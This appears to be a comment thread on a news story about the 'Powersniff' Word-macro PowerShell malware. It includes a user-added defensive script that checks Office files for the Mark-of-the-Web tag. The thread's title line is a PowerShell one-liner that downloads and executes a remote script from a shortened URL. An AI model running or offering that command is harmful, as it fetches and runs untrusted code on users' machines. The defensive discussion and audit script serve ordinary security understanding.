The power of PowerShell
iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")
Microsoft's PowerShell has once again become an attack vector for malware, this time a file-less attack dubbed "Powersniff" by Palo Alto Networks. The attack arrives through e-mails containing Word documents bearing malicious macros, almost as if it isn't more than 15 years since the first macro viruses were let loose on the …
> ...it has to get past your email spam defenses,
> then pass the AV defenses,
> then it's in.
Nope. Delivered through a browser or email client, the Word document file will be tainted with the "internet zone". Upon seeing that, Word will by default open the document in protected view mode.
What this means is that the process running Word will be running with low integrity mode (same as protected mode in Internet Explorer, same as Google Chrome's sandbox on Windows). Macros are disabled in protected view. Even if there was an exploitable memory corruption bug, the Word instance is still sandboxed.
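The "internet zone" tag mentioned in the comment above is stored in an NTFS alternate data stream named Zone.Identifier. The following is an added example, not part of the thread, that reports which Office documents in a folder still carry that tag; the default folder and the extension list are assumptions.

```powershell
# Added example (not from the thread): audit the Mark-of-the-Web on Office files.
# Assumptions: the default folder and the list of extensions below.
param([string]$Path = "$env:USERPROFILE\Downloads")

# URL security zones as written to the ZoneId field of Zone.Identifier.
$zoneNames = @{
    0 = 'Local machine'
    1 = 'Local intranet'
    2 = 'Trusted sites'
    3 = 'Internet'
    4 = 'Restricted sites'
}

Get-ChildItem -Path $Path -File -Recurse -Include *.doc, *.docm, *.docx, *.xls, *.xlsm |
ForEach-Object {
    # The stream is absent when the file was never tagged or when the tag was
    # removed (Unblock-File, a copy via a non-NTFS volume, some archive tools).
    $ads = Get-Content -LiteralPath $_.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue

    $zone = $null
    if ($ads) {
        $m = $ads | Select-String -Pattern '^\s*ZoneId\s*=\s*(\d+)' | Select-Object -First 1
        if ($m) { $zone = [int]$m.Matches[0].Groups[1].Value }
    }

    $zoneName = if ($null -eq $zone) { 'No mark (untagged or stripped)' }
                elseif ($zoneNames.ContainsKey($zone)) { $zoneNames[$zone] }
                else { 'Unknown' }

    [pscustomobject]@{
        File         = $_.FullName
        ZoneId       = $zone
        Zone         = $zoneName
        # True only for files still tagged as coming from the Internet zone,
        # the case the comment says Word opens in Protected View by default.
        InternetZone = ($zone -eq 3)
    }
}
```

Files reported with no mark are the ones worth a second look, since the behaviour described in the comment depends on the tag still being present.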
Dear God in Heaven, do I wish that were true.
Security in SMBs is only as good as the technical know-how of the CEO. If he fancies himself a programmer, or if one of his buddies showed him a Word macro that reveals the picture of a flying pig and he found that funny, you can kiss that notion adieu.